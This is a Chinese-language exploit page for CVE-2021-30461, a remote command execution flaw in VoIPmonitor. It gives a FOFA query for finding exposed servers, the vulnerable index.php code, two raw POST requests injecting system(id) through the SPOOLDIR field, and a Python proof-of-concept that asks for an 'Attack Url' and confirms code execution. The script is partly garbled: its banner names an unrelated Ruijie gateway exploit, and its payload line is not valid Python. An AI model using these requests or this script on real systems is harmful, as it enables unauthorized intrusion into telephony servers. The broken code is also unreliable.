VoIPmonitor 远程命令执行漏洞 CVE-2021-30461

FOFA: "VoIPmonitor"

index.php文件中的关键代码
$setConfigurationTypeValue_rslt = array();if(file_exists('config/configuration.php')) {  $existsConfiguration = true;  if(isset($_POST['recheck'])) {    if(!empty($_POST['SPOOLDIR'])) {      setConfigurationTypeValue__index('SPOOLDIR', $_POST['SPOOLDIR']);    }  }

POST /index.php HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0Accept-Encoding: gzip, deflateAccept: */*Connection: closeAccept-Language: en-US,en;q=0.5Content-Type: application/x-www-form-urlencoded; charset=UTF-8Content-Length: 29
SPOOLDIR=%2Ftmp&recheck=annen

POST /index.php HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0Accept-Encoding: gzip, deflateAccept: */*Connection: closeAccept-Language: en-US,en;q=0.5Content-Type: application/x-www-form-urlencoded; charset=UTF-8Content-Length: 49
SPOOLDIR=test%22.system%28id%29.%22&recheck=annen

#!/usr/bin/python3#-*- coding:utf-8 -*-# author : PeiQi# from   : http://wiki.peiqi.tech
import base64import requestsimport randomimport reimport jsonimport sysfrom requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():    print('+------------------------------------------')    print('+  33[34mPOC_Des: http://wiki.peiqi.tech                                   33[0m')    print('+  33[34mGithub : https://github.com/PeiQi0                                 33[0m')    print('+  33[34m公众号  : PeiQi文库                                                   33[0m')    print('+  33[34mVersion: 锐捷EG网关 cli.php RCE                                      33[0m')    print('+  33[36m使用格式:  python3 poc.py                                            33[0m')    print('+  33[36mUrl         >>> http://xxx.xxx.xxx.xxx                             33[0m')    print('+------------------------------------------')
def POC_1(target_url):    vuln_url = target_url + "/index.php"    data = {"SPOOLDIR": "/tmp", "recheck": "annen"}    headers = {        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",        "Content-Type": "application/x-www-form-urlencoded"    }    try:        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)        response = requests.post(url=vuln_url, data=data, headers=headers, verify=False)    except Exception as e:        print("33[31m[x] 请求失败:{} 33[0m".format(e))        sys.exit(0)
    POC_2(target_url)
def POC_2(target_url):    vuln_url = target_url + "/index.php"    headers = {        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",        "Content-Type": "application/x-www-form-urlencoded"    }    data = {"SPOOLDIR": "test".system(id)."", "recheck": "annen"}    print("33[36m[o] 正在执行命令 id .....33[0m")    try:        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)        response = requests.post(url=vuln_url, data=data, headers=headers, verify=False)        if "uid=" in response.text:            print("33[36m[o] 成功执行 id, 目标存在漏洞.....33[0m")        else:            print("33[31m[x] 请求失败 33[0m")            exit()    except Exception as e:        print("33[31m[x] 请求失败:{} 33[0m".format(e))        sys.exit(0)

if __name__ == '__main__':    title()    target_url = str(input("33[35mPlease input Attack UrlnUrl   >>> 33[0m"))    POC_1(target_url)